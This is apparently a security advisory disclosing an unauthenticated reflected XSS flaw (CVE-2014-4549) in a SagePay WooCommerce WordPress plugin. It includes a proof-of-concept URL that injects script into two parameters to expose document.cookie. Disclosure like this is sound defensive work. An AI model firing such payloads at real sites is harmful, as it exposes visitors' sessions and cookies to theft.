wp-plugin : sagepay-direct-for-woocommerce-payment-gateway – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : sagepay-direct-for-woocommerce-payment-gateway

 

Effected Version : 0.1.6.7 - 20140128 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wordpress/wp-content/wp-plugs/sagepaydirectforwoocommercepaymentgateway/pages/3DComplete.php?MD=MD%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&PARes=PARes%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

 

 

Changelog:http://wordpress.org/plugins/sagepay-direct-for-woocommerce-payment-gateway/changelog/

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-22

 
Plugin Status : Updated on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4549

 
Plugin Description :
 
Sagepay Direct payment gateway for Woocommerce.  Once installed, you can configure this through Woocommerce Payment Gateways tab.

Enable the payment gateway and apply your unique Vendor Name provided by SagePay.

Test first using Simulator mode, then Test mode, once your testing has been completed successfully go to Live mode.

As with all direct payment gateways where your customer doesn't leave your website, you will need a valid SSL certificate and PCI DSS certification.

Tested with WooCommerce version 2.0.20 and compatible with version 2.1

Leave a Reply

Your email address will not be published. Required fields are marked *